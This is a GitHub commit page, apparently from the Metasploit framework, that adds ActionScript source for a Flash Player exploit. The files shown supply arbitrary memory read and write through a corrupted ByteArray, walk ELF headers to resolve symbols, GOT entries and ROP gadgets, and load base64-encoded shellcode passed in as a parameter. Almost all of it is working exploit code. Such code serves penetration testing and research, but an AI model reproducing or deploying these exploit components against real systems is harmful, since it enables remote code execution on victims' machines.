-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add a dir structure for future unknowns too
- Loading branch information
Tod Beardsley
committed
Jul 7, 2015
1 parent
fff6b69
commit 1d8061d
Showing
22 changed files
with
2,305 additions
and
1 deletion.
There are no files selected for viewing
Binary file not shown.
235 changes: 235 additions & 0 deletions
235
external/source/exploits/cve-none/015070700-flash/Elf.as
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,235 @@ | ||
package | ||
{ | ||
public class Elf | ||
{ | ||
private const PT_DYNAMIC:uint = 2 | ||
private const PT_LOAD:uint = 1 | ||
private const PT_READ_EXEC:uint = 5 | ||
private const DT_SYMTAB:uint = 6 | ||
private const DT_STRTAB:uint = 5 | ||
private const DT_PLTGOT:uint = 3 | ||
|
||
private var e_ba:ExploitByteArray | ||
// elf base address | ||
public var base:uint = 0 | ||
// program header address | ||
public var ph:uint = 0 | ||
// number of program headers | ||
public var ph_size:uint = 0 | ||
// program header entry size | ||
public var ph_esize:uint = 0 | ||
// DYNAMIC segment address | ||
public var seg_dynamic:uint = 0 | ||
// DYNAMIC segment size | ||
public var seg_dynamic_size:uint = 0 | ||
// CODE segment address | ||
public var seg_exec:uint = 0 | ||
// CODE segment size | ||
public var seg_exec_size:uint = 0 | ||
// .dynsyn section address | ||
public var sec_dynsym:uint = 0 | ||
// .synstr section address | ||
public var sec_dynstr:uint = 0 | ||
// .got.plt section address | ||
public var sec_got_plt:uint = 0 | ||
|
||
public function Elf(ba:ExploitByteArray, addr:uint) | ||
{ | ||
e_ba = ba | ||
set_base(addr) | ||
set_program_header() | ||
set_program_header_size() | ||
set_program_header_entry_size() | ||
set_dynamic_segment() | ||
set_exec_segment() | ||
set_dynsym() | ||
set_dynstr() | ||
set_got_plt() | ||
} | ||
|
||
public function external_symbol(name:String):uint { | ||
var entry:uint = 0 | ||
var st_name:uint = 0 | ||
var st_value:uint = 0 | ||
var st_size:uint = 0 | ||
var st_info:uint = 0 | ||
var st_other:uint = 0 | ||
var st_shndx:uint = 0 | ||
var st_string:String = "" | ||
var got_plt_index:uint = 0 | ||
|
||
for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit | ||
entry = sec_dynsym + 0x10 + (i * 0x10) | ||
st_name = e_ba.read(entry) | ||
st_value = e_ba.read(entry + 4) | ||
st_info = e_ba.read(entry + 0xc, "byte") | ||
st_string = e_ba.read_string(sec_dynstr + st_name) | ||
if (st_string == name) { | ||
return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4)) | ||
} | ||
if (st_info != 0x11) { | ||
got_plt_index++ | ||
} | ||
} | ||
throw new Error() | ||
} | ||
|
||
public function symbol(name:String):uint { | ||
var entry:uint = 0 | ||
var st_name:uint = 0 | ||
var st_value:uint = 0 | ||
var st_size:uint = 0 | ||
var st_info:uint = 0 | ||
var st_other:uint = 0 | ||
var st_shndx:uint = 0 | ||
var st_string:String = "" | ||
|
||
for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit | ||
entry = sec_dynsym + 0x10 + (i * 0x10) | ||
st_name = e_ba.read(entry) | ||
st_value = e_ba.read(entry + 4) | ||
st_info = e_ba.read(entry + 0xc, "byte") | ||
st_string = e_ba.read_string(sec_dynstr + st_name) | ||
if (st_string == name) { | ||
return base + st_value | ||
} | ||
} | ||
throw new Error() | ||
} | ||
|
||
|
||
public function gadget(gadget:String, hint:uint):uint | ||
{ | ||
var value:uint = parseInt(gadget, 16) | ||
var contents:uint = 0 | ||
for (var i:uint = 0; i < seg_exec_size - 4; i++) { | ||
contents = e_ba.read(seg_exec + i) | ||
if (hint == 0xffffffff && value == contents) { | ||
return seg_exec + i | ||
} | ||
if (hint != 0xffffffff && value == (contents & hint)) { | ||
return seg_exec + i | ||
} | ||
} | ||
throw new Error() | ||
} | ||
|
||
private function set_base(addr:uint):void | ||
{ | ||
addr &= 0xffff0000 | ||
while (true) { | ||
if (e_ba.read(addr) == 0x464c457f) { | ||
base = addr | ||
return | ||
} | ||
addr -= 0x1000 | ||
} | ||
|
||
throw new Error() | ||
} | ||
|
||
private function set_program_header():void | ||
{ | ||
ph = base + e_ba.read(base + 0x1c) | ||
} | ||
|
||
private function set_program_header_size():void | ||
{ | ||
ph_size = e_ba.read(base + 0x2c, "word") | ||
} | ||
|
||
private function set_program_header_entry_size():void | ||
{ | ||
ph_esize = e_ba.read(base + 0x2a, "word") | ||
} | ||
|
||
private function set_dynamic_segment():void | ||
{ | ||
var entry:uint = 0 | ||
var p_type:uint = 0 | ||
|
||
for (var i:uint = 0; i < ph_size; i++) { | ||
entry = ph + (i * ph_esize) | ||
p_type = e_ba.read(entry) | ||
if (p_type == PT_DYNAMIC) { | ||
seg_dynamic = base + e_ba.read(entry + 8) | ||
seg_dynamic_size = e_ba.read(entry + 0x14) | ||
return | ||
} | ||
} | ||
|
||
throw new Error() | ||
} | ||
|
||
private function set_exec_segment():void | ||
{ | ||
var entry:uint = 0 | ||
var p_type:uint = 0 | ||
var p_flags:uint = 0 | ||
|
||
for (var i:uint = 0; i < ph_size; i++) { | ||
entry = ph + (i * ph_esize) | ||
p_type = e_ba.read(entry) | ||
p_flags = e_ba.read(entry + 0x18) | ||
if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) { | ||
seg_exec = base + e_ba.read(entry + 8) | ||
seg_exec_size = e_ba.read(entry + 0x14) | ||
return | ||
} | ||
} | ||
|
||
throw new Error() | ||
} | ||
|
||
private function set_dynsym():void | ||
{ | ||
var entry:uint = 0 | ||
var s_type:uint = 0 | ||
|
||
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) { | ||
entry = seg_dynamic + i | ||
s_type = e_ba.read(entry) | ||
if (s_type == DT_SYMTAB) { | ||
sec_dynsym = e_ba.read(entry + 4) | ||
return | ||
} | ||
} | ||
|
||
throw new Error() | ||
} | ||
|
||
private function set_dynstr():void | ||
{ | ||
var entry:uint = 0 | ||
var s_type:uint = 0 | ||
|
||
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) { | ||
entry = seg_dynamic + i | ||
s_type = e_ba.read(entry) | ||
if (s_type == DT_STRTAB) { | ||
sec_dynstr = e_ba.read(entry + 4) | ||
return | ||
} | ||
} | ||
|
||
throw new Error() | ||
} | ||
|
||
private function set_got_plt():void | ||
{ | ||
var entry:uint = 0 | ||
var s_type:uint = 0 | ||
|
||
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) { | ||
entry = seg_dynamic + i | ||
s_type = e_ba.read(entry) | ||
if (s_type == DT_PLTGOT) { | ||
sec_got_plt = e_ba.read(entry + 4) | ||
return | ||
} | ||
} | ||
|
||
throw new Error() | ||
} | ||
} | ||
} |
37 changes: 37 additions & 0 deletions
37
external/source/exploits/cve-none/015070700-flash/Exploit.as
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
package | ||
{ | ||
import flash.display.Sprite | ||
import flash.events.Event | ||
import mx.utils.Base64Decoder | ||
import flash.display.LoaderInfo | ||
import flash.utils.ByteArray | ||
|
||
public class Exploit extends Sprite | ||
{ | ||
private var b64:Base64Decoder = new Base64Decoder() | ||
private var payload:ByteArray | ||
private var platform:String | ||
private var os:String | ||
|
||
public function Exploit():void | ||
{ | ||
//trace("Got to checkpoint 0"); | ||
if (stage) init(); | ||
else addEventListener(Event.ADDED_TO_STAGE, init); | ||
} | ||
|
||
private function init(e:Event = null):void | ||
{ | ||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl | ||
os = LoaderInfo(this.root.loaderInfo).parameters.os | ||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh | ||
var pattern:RegExp = / /g; | ||
b64_payload = b64_payload.replace(pattern, "+") | ||
b64.decode(b64_payload) | ||
payload = b64.toByteArray() | ||
|
||
removeEventListener(Event.ADDED_TO_STAGE, init); | ||
MyClass.TryExpl(this, platform, os, payload) | ||
} | ||
} | ||
} |
85 changes: 85 additions & 0 deletions
85
external/source/exploits/cve-none/015070700-flash/ExploitByteArray.as
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,85 @@ | ||
package | ||
{ | ||
import flash.utils.ByteArray | ||
|
||
public class ExploitByteArray | ||
{ | ||
private const MAX_STRING_LENGTH:uint = 100 | ||
public var ba:ByteArray | ||
public var original_length:uint | ||
private var platform:String | ||
|
||
public function ExploitByteArray(p:String, l:uint = 1024) | ||
{ | ||
ba = new ByteArray() | ||
ba.length = l | ||
ba.endian = "littleEndian" | ||
ba.writeUnsignedInt(0) | ||
platform = p | ||
original_length = l | ||
} | ||
|
||
public function set_length(length:uint):void | ||
{ | ||
ba.length = length | ||
} | ||
|
||
public function get_length():uint | ||
{ | ||
return ba.length | ||
} | ||
|
||
public function lets_ready():void | ||
{ | ||
ba.endian = "littleEndian" | ||
if (platform == "linux") { | ||
ba.length = 0xffffffff | ||
} | ||
} | ||
|
||
public function is_ready():Boolean | ||
{ | ||
if (ba.length == 0xffffffff) | ||
return true | ||
|
||
return false | ||
} | ||
|
||
public function read(addr:uint, type:String = "dword"):uint | ||
{ | ||
ba.position = addr | ||
switch(type) { | ||
case "dword": | ||
return ba.readUnsignedInt() | ||
case "word": | ||
return ba.readUnsignedShort() | ||
case "byte": | ||
return ba.readUnsignedByte() | ||
} | ||
return 0 | ||
} | ||
|
||
public function read_string(addr:uint, length:uint = 0):String | ||
{ | ||
ba.position = addr | ||
if (length == 0) | ||
return ba.readUTFBytes(MAX_STRING_LENGTH) | ||
else | ||
return ba.readUTFBytes(length) | ||
} | ||
|
||
public function write(addr:uint, value:* = 0, zero:Boolean = true):void | ||
{ | ||
var i:uint | ||
|
||
if (addr) ba.position = addr | ||
if (value is String) { | ||
for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) | ||
if (zero) ba.writeByte(0) | ||
} else if (value is ByteArray) { | ||
var value_length:uint = value.length | ||
for (i = 0; i < value_length; i++) ba.writeByte(value.readByte()) | ||
} else ba.writeUnsignedInt(value) | ||
} | ||
} | ||
} |
Oops, something went wrong.